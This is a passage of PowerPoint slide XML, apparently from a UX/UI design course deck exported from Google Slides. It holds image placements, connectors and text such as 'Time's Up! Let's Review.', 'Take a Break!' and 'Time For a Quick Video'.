        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="865" name="Google Shape;865;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>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66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Google Shape;867;p7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7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69" name="Google Shape;869;p7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870" name="Google Shape;870;p72"/>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871" name="Google Shape;871;p7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872" name="Google Shape;872;p72"/>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873" name="Google Shape;873;p7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74" name="Google Shape;874;p7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75" name="Google Shape;875;p7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7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77" name="Google Shape;877;p7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7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79" name="Google Shape;879;p7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7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81" name="Google Shape;881;p7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7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83" name="Google Shape;883;p7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7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85" name="Google Shape;885;p7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7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887" name="Google Shape;887;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3124233"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="888" name="Google Shape;888;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="889" name="Google Shape;889;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5881600"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="890" name="Google Shape;890;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="891" name="Google Shape;891;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8740767"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="892" name="Google Shape;892;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="893" name="Google Shape;893;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="895" name="Google Shape;895;p7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96" name="Google Shape;896;p7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897" name="Google Shape;897;p73"/>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898" name="Google Shape;898;p7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899" name="Google Shape;899;p73"/>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900" name="Google Shape;900;p7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01" name="Google Shape;901;p73"/>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73"/>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03" name="Google Shape;903;p73"/>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73"/>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05" name="Google Shape;905;p73"/>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73"/>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07" name="Google Shape;907;p73"/>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73"/>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09" name="Google Shape;909;p73"/>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73"/>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11" name="Google Shape;911;p73"/>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73"/>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13" name="Google Shape;913;p73"/>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73"/>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15" name="Google Shape;915;p73"/>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73"/>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917" name="Google Shape;917;p73"/>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18" name="Google Shape;918;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="919" name="Google Shape;919;p73"/>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0" name="Google Shape;920;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="921" name="Google Shape;921;p73"/>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22" name="Google Shape;922;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="923" name="Google Shape;923;p73"/>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24" name="Google Shape;924;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="Google Shape;926;p7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27" name="Google Shape;927;p7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928" name="Google Shape;928;p74"/>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929" name="Google Shape;929;p7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930" name="Google Shape;930;p74"/>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931" name="Google Shape;931;p7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32" name="Google Shape;932;p74"/>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74"/>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34" name="Google Shape;934;p74"/>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74"/>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36" name="Google Shape;936;p74"/>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74"/>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38" name="Google Shape;938;p74"/>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74"/>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40" name="Google Shape;940;p74"/>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74"/>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42" name="Google Shape;942;p74"/>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74"/>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44" name="Google Shape;944;p74"/>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74"/>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46" name="Google Shape;946;p74"/>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74"/>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948" name="Google Shape;948;p74"/>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49" name="Google Shape;949;p74"/>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50" name="Google Shape;950;p74"/>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51" name="Google Shape;951;p74"/>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52" name="Google Shape;952;p74"/>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53" name="Google Shape;953;p74"/>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54" name="Google Shape;954;p74"/>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55" name="Google Shape;955;p74"/>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56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="Google Shape;957;p7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58" name="Google Shape;958;p7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959" name="Google Shape;959;p75"/>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960" name="Google Shape;960;p7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961" name="Google Shape;961;p75"/>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962" name="Google Shape;962;p7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63" name="Google Shape;963;p75"/>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75"/>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65" name="Google Shape;965;p75"/>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75"/>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67" name="Google Shape;967;p75"/>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75"/>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69" name="Google Shape;969;p75"/>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75"/>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71" name="Google Shape;971;p75"/>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75"/>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73" name="Google Shape;973;p75"/>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75"/>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75" name="Google Shape;975;p75"/>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75"/>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77" name="Google Shape;977;p75"/>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75"/>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979" name="Google Shape;979;p75"/>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80" name="Google Shape;980;p75"/>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81" name="Google Shape;981;p75"/>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82" name="Google Shape;982;p75"/>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83" name="Google Shape;983;p75"/>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84" name="Google Shape;984;p75"/>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85" name="Google Shape;985;p75"/>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86" name="Google Shape;986;p75"/>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87"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="988" name="Google Shape;988;p7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89" name="Google Shape;989;p7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990" name="Google Shape;990;p76"/>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991" name="Google Shape;991;p7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992" name="Google Shape;992;p76"/>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993" name="Google Shape;993;p7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94" name="Google Shape;994;p7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7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96" name="Google Shape;996;p7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7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98" name="Google Shape;998;p7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7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00" name="Google Shape;1000;p7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7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02" name="Google Shape;1002;p7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7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04" name="Google Shape;1004;p7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7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06" name="Google Shape;1006;p7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7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08" name="Google Shape;1008;p7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7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010" name="Google Shape;1010;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3364992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1011" name="Google Shape;1011;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5677992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1014" name="Google Shape;1014;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7997952"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1015" name="Google Shape;1015;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1016" name="Google Shape;1016;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10338816"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1017" name="Google Shape;1017;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>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18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p77"/>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020" name="Google Shape;1020;p7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59"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Google Shape;60;p33"/>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61" name="Google Shape;61;p33"/>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3"/>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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Google Shape;63;p33"/>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64" name="Google Shape;64;p33"/>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5" name="Google Shape;65;p33"/>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66" name="Google Shape;66;p33"/>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67" name="Google Shape;67;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558888" y="2822800"/>
            <a:ext cx="6825749" cy="5119304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p33"/>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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1022" name="Google Shape;1022;p7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3" name="Google Shape;1023;p7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24" name="Google Shape;1024;p7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25" name="Google Shape;1025;p78"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time’s Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10559806" y="3048000"/>
            <a:ext cx="3258038" cy="436866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27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Google Shape;1028;p79"/>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29" name="Google Shape;1029;p79"/>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Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p79"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="5338400"/>
            <a:ext cx="12084900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p7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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1033" name="Google Shape;1033;p80"/>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34" name="Google Shape;1034;p80"/>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12800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1035" name="Google Shape;1035;p80"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="3916000"/>
            <a:ext cx="12084900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036" name="Google Shape;1036;p8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37"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1038" name="Google Shape;1038;p81"/>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39" name="Google Shape;1039;p8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40" name="Google Shape;1040;p81"/>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Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>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41" name="Google Shape;1041;p81"/>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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time For a Quick Video</a:t>
            </a:r>
            <a:endParaRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1042" name="Google Shape;1042;p81"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12515940" y="7111733"/>
            <a:ext cx="8696100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043" name="Google Shape;1043;p81"/>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81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="16342144" y="3092266"/>
            <a:ext cx="1477933" cy="1277867"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
